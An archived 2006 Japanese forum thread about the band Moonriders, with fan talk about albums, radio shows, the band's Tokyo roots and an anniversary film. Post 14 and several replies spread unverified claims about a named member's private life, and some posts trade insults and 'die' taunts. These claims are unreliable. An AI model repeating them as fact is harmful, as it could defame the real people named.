2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

「伝説・現在進行形」ムーンライダーズPart10

1 :伝説の名無しさん:2006/06/20(火) 22:04:37
前スレ
「伝説・現在進行形」ムーンライダーズPart9
http://music4.2ch.net/test/read.cgi/legend/1146881964/

2 :伝説の名無しさん:2006/06/20(火) 22:05:19
過去スレ
「伝説・現在進行形」ムーンライダーズPart8
http://music4.2ch.net/test/read.cgi/legend/1144255957/
「伝説・現在進行形」ムーンライダーズPart7,5
http://music4.2ch.net/test/read.cgi/legend/1142092566/
「伝説・現在進行形」ムーンライダーズPart7
http://music4.2ch.net/test/read.cgi/legend/1139986894/
「伝説・現在進行形」ムーンライダーズPart6
http://music4.2ch.net/test/read.cgi/legend/1122114705/
「伝説・現在進行形」ムーンライダーズPart5
http://music4.2ch.net/test/read.cgi/legend/1111778860/
「伝説・現在進行形」ムーンライダーズPart4
http://music4.2ch.net/test/read.cgi/legend/1096572932/
「伝説・現在進行形」ムーンライダーズPart3
http://music4.2ch.net/test/read.cgi/legend/1068567682/
「伝説・現在進行形」ムーンライダーズPart2
http://music2.2ch.net/test/read.cgi/legend/1046106165/
伝説〜現在進行形〜ムーンライダーズ
http://music2.2ch.net/legend/kako/1023/10238/1023888092.html

3 :伝説の名無しさん:2006/06/20(火) 22:05:53
関連サイト
公式サイト
ttp://www.moonriders.net/
ファンクラブサイト
ttp://www.moonriders.com/
慶一さんとこ
ttp://keiichisuzuki.com
慶一さんblog
ttp://d.hatena.ne.jp/suzukikeiichi/
博文さんblog
ttp://d.hatena.ne.jp/hirobumisuzuki/
かしぶちさんとこ
ttp://kashibuchi.com/
白井さんとこ
ttp://www.tonpi.net/
岡田さん主宰 Valb
ttp://www.valb.info/
メトロトロン(再始動)
ttp://www.ymns.com/metrotron/

関連ページ
月光庵
ttp://www.1101.com/moon/

4 :伝説の名無しさん:2006/06/20(火) 22:07:17
関連ミュージシャンスレ
■カーネーションスレPart12■
http://music5.2ch.net/test/read.cgi/musicjg/1130940065/
■青山陽一スレッド■
http://music5.2ch.net/test/read.cgi/musicjm/1130985127/
【科学の神秘】鈴木さえ子【緑の法則】
http://music4.2ch.net/test/read.cgi/legend/1088098437/


5 :伝説の名無しさん:2006/06/20(火) 22:20:35
乙。今スレでもかますかな。

6 :伝説の名無しさん:2006/06/20(火) 22:25:46
乙乙

7 :伝説の名無しさん:2006/06/20(火) 22:47:49
乙カレー

8 :伝説の名無しさん:2006/06/20(火) 22:52:51
ボクは走って乙になる

9 :伝説の名無しさん:2006/06/21(水) 00:17:33
歩いて、車で、スプートニクで

10 :伝説の名無しさん:2006/06/21(水) 00:25:33
他人と比べてみると セールスちょっと足りないけど
素敵なホールや街、ドームや武道館知らないけど

11 :伝説の名無しさん:2006/06/21(水) 01:11:57
音楽は売り上げだけで出来てるんじゃない

12 :伝説の名無しさん:2006/06/21(水) 05:16:57
な・なぐ・さ・めて3・2・1ゼロ!

13 :伝説の名無しさん:2006/06/21(水) 09:32:06
しーらなかったー。何時の間にアンチだらけなんてー♪

14 :伝説の名無しさん:2006/06/21(水) 11:47:21
[ブログの削除部分]

誰かに養われている男は、誰かを養っている男より、ある意味において自意識過剰である。

そして、養われている男は常に劣等感に苛まれていると同時に、
不思議な優越感をも持て余していて、しばしばその優劣の体内バランスを取り損ねている。

バランスを崩した挙げ句、どうしようもなくしでかしてしまう一連の妙な行動は、
はたで見ている限り、病の一種だ。養われ病、というところだろうか。

お気軽な相手とねんごろになったりする淫行はまだ軽度な方で、
養われ病もステージが進むと、罰当たりなことに、
自分を養っている相手を貶めるようなことを平然と行うようになる。

ヒドイことをしている自覚が大きければ大きいほど、
後ろめたさに圧しつぶされそうになればなるほど、
ただ養われ、ただ生きている自分の身の上に重くのしかかりいつまで経っても解けない
「お金を稼ぐことが出来ない謎」
「こんな人生を送ることになった本当の理由」を少なくともその間は考えなくて済むのだろう。

自分のお父さんが介護を必要とする大変な状況にあるというのに、
年がら年中外のオンナと専用チャットで次のデートのスケジュール合わせに興じたり、
還暦を迎えるご婦人のツバメもどきを演じてみたり、
海外に住む女友達に自分のありきたりな日常生活のことをせっせと報告してみたり、
哀れな逃避行為に走ってばかりいる。


15 :伝説の名無しさん:2006/06/21(水) 12:26:45
またかよ!いい加減にしろって

16 :伝説の名無しさん:2006/06/21(水) 13:24:08
>10
誰がうまい事言えと(ry

>15
エサはやらない事。

17 :伝説の名無しさん:2006/06/21(水) 20:45:24
>>15
博文の人間性をわからせるよい資料じゃないか

18 :伝説の名無しさん:2006/06/21(水) 21:04:32
ダリエがまざっとる。

19 :伝説の名無しさん:2006/06/21(水) 21:25:57
メジャーに復帰しないとますます駄目になる

20 :伝説の名無しさん:2006/06/21(水) 21:53:41
メトロトロン社主では喰えないのかしら(´・Д・`)

21 :伝説の名無しさん:2006/06/21(水) 22:36:00
ダリエもエンジョイしてそうだよね・・・介護の心配しなくていいし。


22 :伝説の名無しさん:2006/06/21(水) 22:37:20
慶一さんブログ短くていいから更新してよー

23 :伝説の名無しさん:2006/06/21(水) 22:57:06
短文
「虫唾が走ってハイになる」

24 :伝説の名無しさん:2006/06/21(水) 23:51:39
慶一氏のブログいつになったら今に追いつくのだろうか・・・。昔のことより今のこと
書いてほしいんだけどなー

25 :伝説の名無しさん:2006/06/22(木) 00:11:31
慶一は飽きっぽいよな

26 :伝説の名無しさん:2006/06/22(木) 00:16:39
「20世紀の〜」から随分たつし、
そろそろ第3のライダーズ本出してくれないかな。


27 :伝説の名無しさん:2006/06/22(木) 03:11:52
新宿南口の、甲州街道沿いの広告で
K1発見!!!

http://read.kir.jp/file/read49881.jpg

28 :27:2006/06/22(木) 03:18:33
す、すいません…
こっちが本当のK1広告?です。
マジですいません

http://sakuratan.ddo.jp/imgboard/img-box/img20060622031615.jpg

29 :伝説の名無しさん:2006/06/22(木) 09:55:16
>>28
これ何の広告なの?
夜道で見たら悪い意味でドキッとしそうだw

30 :伝説の名無しさん:2006/06/22(木) 10:33:27
まだ見に行ってないけどこれかな?
http://www.ktr.mlit.go.jp/toukoku/ssb/language.htm
森山とかもやってるみたいだけど。

31 :伝説の名無しさん:2006/06/22(木) 11:44:56
>>28
コレなんて蝋人形の館?

32 :伝説の名無しさん:2006/06/22(木) 20:59:04
90年代ライダーズから入ったんですが
評判芳しくないんですね・・・。


33 :伝説の名無しさん:2006/06/22(木) 21:14:12
人によって言う事が随分違う。
A.O.R.や夜辺りは特に。
まあ、この時期の話する時に癌になるのは80年代前半にこだわってる現在
40前後の聞分けの無い馬鹿。

34 :伝説の名無しさん:2006/06/22(木) 21:15:08
なつかしい

35 :伝説の名無しさん:2006/06/22(木) 21:19:18
ファン歴が人生の半分以下のやつはカス

36 :伝説の名無しさん:2006/06/22(木) 21:29:51
>>32
ここの書き込みを丸々信じてどうする
自分の感性で判断しろや

37 :伝説の名無しさん:2006/06/22(木) 21:32:52
介護から逃げたとかしつこいのが一人いるね。
自分が親の介護で奥さんに逃げられたの?

38 :伝説の名無しさん:2006/06/22(木) 21:37:06
違う、介護してる奥さんたちが文句書いてる。

 「お前だけ逃げるな。」


39 :伝説の名無しさん:2006/06/22(木) 21:43:46
>>37
大人には大人の事情や感情があるんだよ
一人や二人じゃないぞ

40 :伝説の名無しさん:2006/06/22(木) 22:11:51
疲れたときにはバックシートを聴こう

41 :伝説の名無しさん:2006/06/22(木) 23:12:56
>>38
君を愛してる、マイ・ラブ だから僕の好きにさせてくれ

42 :伝説の名無しさん:2006/06/22(木) 23:27:56
>>32
おれも90年代から。
昔の曲も好きだけど、愛着はやっぱり最近の曲のほうがあるな。

43 :伝説の名無しさん:2006/06/23(金) 00:39:02
大丈夫、介護してないからもともと。
ふーちゃんの負担は変わってないんだよ。
ダリエちゃんがそんなことするわけないでしょ。

他人である嫁がそうそう介護してくれると思ってるのが間違いだ。

あなた方が思ってるより、ふーちゃんはしっかりしてんのよ、兄の慶一さんよりも。

44 :伝説の名無しさん:2006/06/23(金) 01:18:14
だからクドイっての、そういうファンしかいねぇのここ?

45 :伝説の名無しさん:2006/06/23(金) 02:09:10
恐るべし主婦ヲタ

46 :伝説の名無しさん:2006/06/23(金) 02:32:50
こんなところでファンの質にとやかく言ったってしょうがないんじゃない?

47 :伝説の名無しさん:2006/06/23(金) 03:39:05
結局、30周年ライブはCD化しないのかな?

48 :伝説の名無しさん:2006/06/23(金) 06:13:23
みんな忘れた頃に発売されると予想

49 :伝説の名無しさん:2006/06/23(金) 06:38:39
DVDで出してほしい
あがたさんの大寒町と赤色エレジーとトークを全て収録してくれたらうれしい

50 :伝説の名無しさん:2006/06/23(金) 08:51:41
>>48
同意
今出せば売れるのにという時期を大幅にはずして
なんで今頃という時期に売る
それがムーンライダーズクォリティ 買うけどね

51 :伝説の名無しさん:2006/06/23(金) 12:25:09
12月に映画館でやるっていうんだから、そのあとだろう。

52 :伝説の名無しさん:2006/06/23(金) 19:12:38
映画?誰が見に行くんだよ

53 :伝説の名無しさん:2006/06/23(金) 19:33:44
ふうちゃんしっかりしてるって・・・なんかすごい信者なんだね

54 :伝説の名無しさん:2006/06/23(金) 19:34:23
誰が監督なの?

55 :伝説の名無しさん:2006/06/23(金) 19:36:07
タカダワタル的みたいな・・・

56 :伝説の名無しさん:2006/06/23(金) 19:38:20
フレッシュな高校生、CD聞いたのかな?

57 :伝説の名無しさん:2006/06/23(金) 20:04:47
なんだかオールドファンって、
ずーっと昔の思い込みから離れられないみたいね
人も変われば曲も変わるだろうに

58 :伝説の名無しさん:2006/06/23(金) 20:10:00
知ったかな事書き込んでないで死ねよ。

59 :伝説の名無しさん:2006/06/23(金) 20:41:02
映画期待していいのかな?

60 :伝説の名無しさん:2006/06/23(金) 21:28:10
ファン暦23年くらい。
アマチュアアカデミーの頃から今まで。
たぶんこれからもずっとファン。
味わい深い歌詞やひねくれた感じでポップで
複雑なサウンドが好み。。。と
なぜライダーズか?ライダーズのどこがイイのか?考えて
たらよくわからなくなった。他バンドより好みといえばそれだけ
なんだけど、
どーしても明確な言葉で「ライダーズのココが好き」を定義したい。
でもうまい言葉が見つからないので
参考までに他のファンの皆様のライダーズの好きな理由を聞かせてもらいたい。
とにかく嫌な面はおいといて「好きな」部分を聞かせてもらえませんか?

61 :伝説の名無しさん:2006/06/23(金) 21:47:45
>>58
お前は何を知ってるのwww
日常の澱をネットで人を攻撃することくらいでしか
何とかできない訳www
お気の毒ね

62 :伝説の名無しさん:2006/06/23(金) 21:52:44
>60

プロフェッショナルになりきれないところかな。
もう重鎮なはずなんだけど、どっか頼りないというか、ヘタれというか。
そのアマチュアっぽさが好き・・・私はね


63 :伝説の名無しさん:2006/06/23(金) 21:54:59
>>60
詩が尋常じゃないところが好き

64 :伝説の名無しさん:2006/06/23(金) 21:57:24
うん、他と比べてどうだと言われればやっぱ慶一の詞だと思う

65 :伝説の名無しさん:2006/06/23(金) 21:58:54
なぜ好きになるかなんて説明できることじゃないよな。
ドントラの頃にライブジャック見てたら友人が
「なにこの人たち!おもしれーー!!」ってそれからハマったよ。
たぶん自分のときもそんな感じだったんじゃないかな。
それよりずいぶん前の「イスタンブールマンボ」の頃だったけどさ。
かわいくてセンスがある、とかなんとか言えても、どうしても説明
しきれないよな。

66 :伝説の名無しさん:2006/06/23(金) 22:01:47
ライブジャック懐かしいな見にいったな
ムーンライダーズ到着がかなり遅れてたな


67 :伝説の名無しさん:2006/06/23(金) 22:41:13
あのライブ行ったよー昔のフジテレビ。テッチーが普通に歩いててビックリ
したの覚えてます。

68 :伝説の名無しさん:2006/06/23(金) 22:54:10
オールドファンの一人です。私はポップザヒーローっていうラジオで慶一さんが
DJをしていてエレファントを流したのがきっかけかな・・・だから25年たつけど
昔の曲に執着してるわけじゃないんだけど、やっぱりライブが今と昔との差
がありすぎるんじゃないかな・・・青空とかアマチュアの渋公とかね



69 :伝説の名無しさん:2006/06/23(金) 22:59:09
>>68
懐かしい!!ポップザヒーロー80's ハガキ読まれた事あったよ

70 :60:2006/06/23(金) 23:03:26
僕もライブジャック見に行きました。
すごく待たされて「マニアの受難だねェ。。。」なんて
うまいこと言う人いたりして。
ドントラのボクハナクの「あ・あ・あ〜あ〜ア♪」の
テッチーさんたちのコーラスを脳内再生するだけで
いまだに♂♂アゲアゲ♂になれます。

そうですよねー。やっぱり詩は尋常じゃないんですよね。
再確認できました。ライダーズの詩に慣れて尋常じゃないのが
通常(?)に感じてたかも。
慶一さんの詩があり、他メンバーや外部委託の詩があり
それなりのバランスで僕を楽しませてくれてるんだなぁ。
歌も慶一さんの声色(こわいろ)あり武川さんや白井さんの声色ありで
飽きないというか具沢山というかおなかいっぱいだけど美味しいというか。
サウンドのほうも各人のアイディアやパクリ満載で
「音の玉手箱や〜」状態なところに満足させられてるんだなぁ。
でこんな濃いものって受け取る側もそれなりのキャパがないと
拒絶されることも多いんじゃないかなーといまさらながら思ってみたり
みなかったり。

71 :伝説の名無しさん:2006/06/23(金) 23:36:45
自分のきっかけは、林美雄の「パック・イン・ミュージック」。
名物コーナー「ゆあ・ひっとしない・ぱれえど」で
「モダーン・ラヴァーズ」を聴いてハマった。

72 :伝説の名無しさん:2006/06/23(金) 23:56:05
ログインから入ったのは俺くらいなもんだろうw
良明さんへのMIDIについてのインタビューだったな。

73 :伝説の名無しさん:2006/06/24(土) 00:31:45
きっかけはさかもっさんのサンスト。
今の坂本龍一に興味はゼロだけど、あのラジオからたくさんの音楽を知った。

74 :伝説の名無しさん:2006/06/24(土) 01:08:57
大学のバソドサークルでトップクラスに上手い人たちががムーソライダーズのコピーバソドやってた。
だから最初に聞いたのはその先輩達の演奏w
ステージ上でひっくり返ったりスティックを放り投げたりしながらの「ジャブ・アップ・ファミリー」、
こんなステージを見て「本物はどういう人たちなんだろう?」と興味を持った。

75 :伝説の名無しさん:2006/06/24(土) 01:36:19
オレのきっかけはビートニクスだったな。
鈴木慶一も最初はテクノの人かと思ってた。

76 :伝説の名無しさん:2006/06/24(土) 01:56:22
ファン歴最低でも15年無い奴はファンを名乗る資格はない。

77 :伝説の名無しさん:2006/06/24(土) 02:11:38

なにこいつ。

78 :伝説の名無しさん:2006/06/24(土) 02:58:15
>>76
お前が決めるな!!!

79 :伝説の名無しさん:2006/06/24(土) 03:19:30
「最後の晩餐」からのファンでもギリギリok?

80 :伝説の名無しさん:2006/06/24(土) 08:44:27
最後の晩餐リリース当時のメディア露出振りを見て
何故か東京一は日本一を91年6〜7月辺りに購入して以来の私はダメですかそうですか
クラウン時代から徳間にすすんだんだけど。。。

81 :伝説の名無しさん:2006/06/24(土) 08:50:24
30周年記念のベスト盤とか出して盛り上げれば新規のファンが増えるんじゃないの

82 :伝説の名無しさん:2006/06/24(土) 09:07:16
まあ何というか30後半以上のオッサンが多いことはよく分かったよ。

83 :伝説の名無しさん:2006/06/24(土) 09:08:12
ムーンライダーズにしても、他の大御所とか言われる人達にしても、もっと御新規さんを呼び込まなくちゃ。

84 :伝説の名無しさん:2006/06/24(土) 09:09:37
何年目とか関係ないよ。ファンのスピリットはすごい大事だし
そんなことにこだわるほうがアホ

85 :伝説の名無しさん:2006/06/24(土) 09:17:08
スピリットとか表現がダサイんだよ

86 :伝説の名無しさん:2006/06/24(土) 09:48:12
良くないよ。そういうの。
ダサいなんてナゥくない表現じゃん。

87 :伝説の名無しさん:2006/06/24(土) 10:07:49
>>70
彼らは新作に何でもかんでも詰め込みすぎる。
100の内10程度でいいのに50も60も詰め込むからなぁと朝妻一郎も云っていたよなぁ。

88 :伝説の名無しさん:2006/06/24(土) 10:33:53
最近はソロの寄せ集めだけどね
慶一と岡田の曲だけで1枚くらい作ってもいいと思う

89 :伝説の名無しさん:2006/06/24(土) 14:19:47
俺の曲だけで一枚つくって欲しい
マジで

90 :伝説の名無しさん:2006/06/24(土) 16:23:38
>89
誰だ?

91 :伝説の名無しさん:2006/06/24(土) 17:38:46
博文さん

92 :伝説の名無しさん:2006/06/24(土) 17:45:32
よくムーンライダーズは東京のバンドって言うけど、
田舎住まいのおれにはいまいちピンとこないんだよね。
ライダーズの「東京らしさ」はどこにあるのか、東京の人たち教えてください。

93 :伝説の名無しさん:2006/06/24(土) 17:51:00
ライダーズは蒲田のバンドだからな
田舎くさい

94 :伝説の名無しさん:2006/06/24(土) 17:57:24
僕歌いたい

95 :伝説の名無しさん:2006/06/24(土) 18:16:52
↑ハクブンウザス(w
東京らしさも何もないよ
80年代のライダーズは流行へのウィットや皮肉など捻った感じがかっこ良かったが
今のはジジイの愚痴止まりで詞も音もMIXも素人と変わらないね
プレイがプロだからまだギリギリOKなだけ

96 :伝説の名無しさん:2006/06/24(土) 18:20:53
>94
岡田ですw

ライダーズって「東京」っていうより「東京の下町らしさ」って感じがする。


97 :伝説の名無しさん:2006/06/24(土) 18:21:54
原因は?
http://www.ron.gr.jp/law/law/keihou.htm

98 :伝説の名無しさん:2006/06/24(土) 18:56:10
お前等と馴合いたくなんかない。ライダーズのボイスなんかも要らない。
俺は俺なんだ。

99 :60/70:2006/06/24(土) 18:58:54
皆様ありがとございました。

100 :伝説の名無しさん:2006/06/24(土) 21:04:37
ttp://blog.excite.co.jp/makinomiya/
4月15日と30日の写真とコメントあり。

101 :伝説の名無しさん:2006/06/24(土) 21:21:53
お母さんだったとはしりませんでした
あんな綺麗なかあちゃんがいたら参観日楽しみだろうな

102 :伝説の名無しさん:2006/06/24(土) 22:51:34
たしか南佳孝とかシュガーベイブとかがシテイポップとか言われてて、ライダーズも
そのくくりみたいな感じだったような。

103 :伝説の名無しさん:2006/06/24(土) 22:53:57
東京は広いからなあー山の手とか川の手とか三多摩とかね・・

104 :伝説の名無しさん:2006/06/24(土) 22:56:16
山の手以外は東京とはいえない。
大田区なんて人間の住む場所とはいえない。

105 :伝説の名無しさん:2006/06/24(土) 23:14:26
熊がきたぞww。

106 :伝説の名無しさん:2006/06/24(土) 23:21:02
何れにしても都民以外にライダーズを聴いて欲しくないし語って貰いたくない。
ファンの資格なんかそんな連中には無いよ。

107 :伝説の名無しさん:2006/06/25(日) 00:56:14
ライダーズのファンて性格悪い人しかいないの?

108 :伝説の名無しさん:2006/06/25(日) 01:01:52
都内在住のロートルファンの性格が悪いだけ

109 :伝説の名無しさん:2006/06/25(日) 01:11:39
いい年して心の狭い人が多い。

110 :伝説の名無しさん:2006/06/25(日) 03:57:16
>>102
実は鈴木慶一は5人目のはっぴいえんどになる可能性もあったとは大瀧詠一の弁

111 :伝説の名無しさん:2006/06/25(日) 07:46:32
5人目のはっぴいえんど=鈴木慶一、告井延隆、野地義行

112 :伝説の名無しさん:2006/06/25(日) 11:40:20
大田区は日本のリバプールだろ、佳孝とか慶一とかさ。

113 :伝説の名無しさん:2006/06/25(日) 11:46:18
最近痛い人たちが沸いてるのも30周年だから?
活気があっていいね

114 :伝説の名無しさん:2006/06/25(日) 11:56:08
大田区に文化なんかない
田園調布と蒲田の貧富の差がはっきりしてるだけ

115 :伝説の名無しさん:2006/06/25(日) 12:42:03
↑このひとなにもの?

116 :伝説の名無しさん:2006/06/25(日) 12:52:12
慶一

117 :森田健作:2006/06/25(日) 13:42:00
114くん、僕と共に戦おうじゃないか。

118 :伝説の名無しさん:2006/06/25(日) 17:16:22
ここはまちBか?

119 :伝説の名無しさん:2006/06/25(日) 17:54:04
はっぴいえんど>>>>>>>>>>>>>>>>>>>>>>永遠に越えられない壁
>>>>>>>>>>>はちみつぱい

120 :伝説の名無しさん:2006/06/25(日) 18:32:44
「東京一は日本一」とか言ってる慶一は大田区のしかもはずれの出身じゃないかと
高校出るまで電車も乗れなかった奴に何がわかるのかと

121 :伝説の名無しさん:2006/06/25(日) 18:42:31
相変わらずささくれ立った枝木のようなスレだ(w

122 :伝説の名無しさん:2006/06/25(日) 19:16:25
www

123 :伝説の名無しさん:2006/06/25(日) 19:36:47
なんか醜い・・・・・

124 :伝説の名無しさん:2006/06/25(日) 19:43:29
だったら死ねば?用無し。

125 :伝説の名無しさん:2006/06/25(日) 20:21:38
例の祭り以来、痛い人たち主体になったね

126 :伝説の名無しさん:2006/06/25(日) 20:24:47
パソコン通信からWebに移行した辺りは
それぞれ孤立していたファンが繋がって喜んでたのにな。
今じゃ、このありさまか。

127 :伝説の名無しさん:2006/06/25(日) 20:47:22
類は友を呼ぶ
同じ穴のムジナ

128 :伝説の名無しさん:2006/06/25(日) 21:04:21
蒲田というより羽田
産業道路よりこっち側だから
蒲田はいまや大田クルーの縄張りww

129 :伝説の名無しさん:2006/06/25(日) 21:32:04
醜すぎる・・・

130 :伝説の名無しさん:2006/06/25(日) 21:33:21
ばいばい!死んでね。きゃはは!!

131 :伝説の名無しさん:2006/06/25(日) 21:47:36
慶一の作だと羽田の歌って「塀の上で」と「センチメンタル通り」くらいしかないね

132 :伝説の名無しさん:2006/06/25(日) 21:52:48
ハネディアンがあるじゃないか。あれはあがたさんと共作だけど。

133 :伝説の名無しさん:2006/06/25(日) 21:56:08
死ね死ね言ってる奴、誰だかわかった!

134 :伝説の名無しさん:2006/06/25(日) 22:05:51
そういえば「酔いどれダンスミュージック」も羽田の歌だ
「土手の向こうに」とか「薬屋さん」もそうなのかな

135 :伝説の名無しさん:2006/06/25(日) 22:51:23
>>133
誰なのう?

136 :伝説の名無しさん:2006/06/25(日) 23:00:40
はちみつぱい時代の歌ばかりだね。
地域性はそのころのほうが濃かったのかな。

137 :伝説の名無しさん:2006/06/25(日) 23:09:29
どうでもいいよそんなの。

138 :伝説の名無しさん:2006/06/25(日) 23:49:29
ビートニクスの「♪ある晴れた日に旅立つジェット」が好きだ。

「モダーン・ラヴァース」は博文か。

139 :伝説の名無しさん:2006/06/26(月) 00:04:29
賢明なライダーズファンの皆さん。
和久井光司ってぶっちゃけ ど う な の?

140 :伝説の名無しさん:2006/06/26(月) 00:37:45
なぜ和久井光司なの?花田じゃないよね

141 :伝説の名無しさん:2006/06/26(月) 00:46:14
つまんね

142 :伝説の名無しさん:2006/06/26(月) 01:56:18
232 ホワイトアルバムさん@自治議論中 2006/06/22(木) 00:18:54 ID:iBUXAz+h
和久井の四人囃子関連デマについて詳しい人いる?

233   2006/06/22(木) 00:57:44 ID:5C+XPl1K
>>232
事実関係をロクに調べないで鵜呑みにし、それを掲載するという大失態を犯した話のことかな?

【ラブ・ジェネレーション 1966-1979】(2000年/音楽之友社刊)というムック本に、
四人囃子の『ある青春〜二十歳の原点』のアルバム評を担当。

「自殺した女子学生の同名ベストセラー手記の映画化と共に企画された、
いわゆるサントラ盤とは趣の異なったアルバム。
(中略)
映画に出演した新人女優、角ゆり子の“語り”と交互にアルバムを彩っていく四人囃子の音楽は、
(中略)
後に角ゆり子は僕と同じ区のアパートで殺害され、それを元恋人だった僕の高校の国語教師から聞かされる、
というオマケがついた忘れられない一枚。」

で、問題は角ゆり子さんが今でも生きているという事実。
ただ、これと似た事件なら、菊容子さん(魔女先生で有名。恋人の俳優に殺害される)のことがある。
彼はこの事件と混同しているのかもしれない。

234 ホワイトアルバムさん@自治議論中 sage 2006/06/22(木) 02:28:02 ID:???
「僕と同じ区の〜」「僕の高校の国語教師から〜」
和久井のオレ情報www

143 :伝説の名無しさん:2006/06/26(月) 03:24:06
つまんね

144 :伝説の名無しさん:2006/06/26(月) 06:45:05
和久井は竹田和夫からも避難されてたな

145 :伝説の名無しさん:2006/06/26(月) 09:29:22
>>142
この本持っているけど。。。
この記述確かに載ってるな。

146 :伝説の名無しさん:2006/06/26(月) 15:05:47
どうしてコレがあんな曲になるんだ?
http://youtube.com/watch?v=DcA6KpTDpnQ

147 :伝説の名無しさん:2006/06/26(月) 18:17:34
あんな曲?

148 :伝説の名無しさん:2006/06/26(月) 19:04:09
モダーンラヴァーズのことか
トゥナアアァァィィト イェイイェイイェイ!
イェイイェイがうざい

149 :伝説の名無しさん:2006/06/26(月) 21:02:20
俺はあのシャクリ上げ唱法好きだけどな
「彼女について知っている二、三の事柄」とか

150 :伝説の名無しさん:2006/06/26(月) 21:02:51
>>146
メロディや詞自体の影響はない
スカスカの音作りが新鮮だった、その影響があんな曲
わかった?

151 :伝説の名無しさん:2006/06/26(月) 21:27:02
詩が臭い>モダンラバーズ
あいつに詩を書かせるな。

152 :伝説の名無しさん:2006/06/26(月) 21:59:54
まあ自分で暴露して居直ってるパクりバンドだからな。
今ならインスパイアって言うんですか?

153 :伝説の名無しさん:2006/06/26(月) 22:04:50
臭い詞はあの時代には新鮮だった
使い古された言葉が新鮮だった、それだけ

154 :伝説の名無しさん:2006/06/26(月) 22:07:38
インスパイアっていうんですか?それがない音楽があったら聴いてみたいもんだ
オレをジャンルに当てはめるな、しいて言えばオレがジャンル、ってかw

155 :伝説の名無しさん:2006/06/26(月) 22:16:42
ようやっと「○○風」の曲をあまり書かなくなったというのに、逆にオッサン達の評判は芳しくないw

156 :伝説の名無しさん:2006/06/26(月) 22:22:10
養命酒風

157 :伝説の名無しさん:2006/06/26(月) 22:31:33
慶一の暗い曲はつまんない

158 :伝説の名無しさん:2006/06/26(月) 22:33:43
オフコースを意識して詞を書きましたとか平気で言ってた慶一さんてすごい。


159 :伝説の名無しさん:2006/06/26(月) 22:34:30
インスパイアとかオマージュとか便利な言葉だ

160 :伝説の名無しさん:2006/06/26(月) 22:43:45
慶一は能書き多いからなあ

161 :伝説の名無しさん:2006/06/26(月) 23:03:44
       YES ← 友達多い?→ NO
       ↓             └→集団生活で
 彼女ができたことある?        いつも一人?
  ┌YES┘ └NO┐     ┌NO──┘ └YES┐
  ↓          ↓      ↓            ↓
童貞捨てた?   学生時代に      パシリ・いじめ・カツアゲの
|   └NO─→ 女友達いた?―NO→ 被害経験あり?
YES       YES┘         ┌NO┘   └YES
↓         ↓     .       ↓        └→無職or童貞ですか?
勝組     その子と今でも   大声で自慢できない←NO┘  └YES
        遊ぶ?  └NO→ 趣味がある?             ↓
そこそこ←YES┘ 頑張れ←NO┘  └─YES→人生オワタ\(^o^)/


162 :伝説の名無しさん:2006/06/26(月) 23:28:32
逆にライダーズ風なんてモノはあるのだろうかと考えてみたり。

「同じことを繰り返さなかった」と誇らしげに彼らは言うが、人から「これってライダーズっぽいね」と
言われるような確固たるサウンドは残せたのであろうか、またはこの先に残すことが出来るのであろうか。

163 :伝説の名無しさん:2006/06/27(火) 00:03:52
>>158
それ初めて聞いた。
いつ頃の話ですか?

164 :伝説の名無しさん:2006/06/27(火) 00:15:20
>>162
残せなかったし、そもそも残そうとも思っていなかったんじゃないかな。
チャンスがあったとすれば、マニエラのころかもしれないけど、
それもあっさり手放しちゃったしな…
今となっては引き返すこともできないので、
このままフラフラと漂い続けてほしい。

165 :伝説の名無しさん:2006/06/27(火) 01:09:42
>>163
大昔出たミュージックスティディのライダーズ特集でそう書いてあった

166 :伝説の名無しさん:2006/06/27(火) 01:20:39
まさかカメラ=万年筆辺り?

167 :伝説の名無しさん:2006/06/27(火) 01:27:32
「ヴァージニティ」とかオフコースを意識したって何かに書いてあったような気がする

168 :伝説の名無しさん:2006/06/27(火) 01:44:10
>>163
それってフライトレコーダーにそのまま
流用されたヤツだよね。
ちなみにヴァージニティーがオフコースを意識したらしい。

169 :伝説の名無しさん:2006/06/27(火) 12:17:35
あのつまらなさの原因はそれか…。

170 :伝説の名無しさん:2006/06/27(火) 17:40:08
鈴木慶一がソロやって小田和正の弾き語りのように
コンサバ、お姉系な女性ファンズを魅了できるか?絶対無理。

171 :伝説の名無しさん:2006/06/27(火) 22:39:35
そういえばフライトレコーダーって御巣鷹山の日航の事故の前に作詞されたんだよね
あの詞怖いよね・・・

172 :伝説の名無しさん:2006/06/27(火) 23:59:53
>171
「HEAVY FLIGHT」のこと?

173 :伝説の名無しさん:2006/06/28(水) 02:53:46
JAL123の事故が85年の8月か。
そうなのかも。勿論なんの関連も無いのだろうが。

174 :伝説の名無しさん:2006/06/28(水) 19:39:32
ヘビーフライトだった。スマソ

175 :伝説の名無しさん:2006/06/28(水) 20:47:37
新宿の兄ワロタ

176 :伝説の名無しさん:2006/06/28(水) 22:32:06
新宿のどの辺りにありますか?甲州街道沿のどこ?

177 :伝説の名無しさん:2006/06/28(水) 23:51:33
タワレコの2階出口を背中にして、そのまままっすぐ甲州街道に向かって歩いて、ちょっと左を見た所にあったよ。
(甲州街道は渡りません)

178 :伝説の名無しさん:2006/06/30(金) 02:41:41
今年のフジロックの出演者に
The SUZUKI

とありますけど。

179 :伝説の名無しさん:2006/06/30(金) 03:57:02
福祉政策ですな

180 :伝説の名無しさん:2006/06/30(金) 10:05:06
80年代から時間が止まってる池沼が好きそうな音楽だよね、
ムーンライダーズ

181 :伝説の名無しさん:2006/06/30(金) 10:27:34
池沼って何でつか(´・Д・`)

182 :伝説の名無しさん:2006/06/30(金) 11:17:18
80年代から今に至るまで真性童貞のオレが来ましたよ

183 :伝説の名無しさん:2006/06/30(金) 11:38:06
お、妖精出現w

184 :伝説の名無しさん:2006/06/30(金) 12:06:45
当のメンバー達も時間が止まっちまってるしな
しかもパクリ多いし歌ヘタだし。

今となっては「これが好きな俺センス良い」的な音楽
ですら無いよ。昔はそれが通用したがね。
未だにそれを信じてるのは老害の信者だけ。

185 :伝説の名無しさん:2006/06/30(金) 13:25:33
ここで煽ってるのはアンチ化した元信者でしょ?

186 :伝説の名無しさん:2006/06/30(金) 13:38:13
N田事件以前と以降でまったくスレの様相が変わったもんな〜
元スレ住人の比率はかなり下がっているだろうとは思う。

187 :伝説の名無しさん:2006/06/30(金) 18:15:11
N田事件とは?

188 :伝説の名無しさん:2006/06/30(金) 18:28:49
またそうやって蒸し返そうとするw

189 :伝説の名無しさん:2006/06/30(金) 19:19:35
祭りにできりゃなんでもいいんだろ、きっと。

190 :伝説の名無しさん:2006/06/30(金) 21:55:29
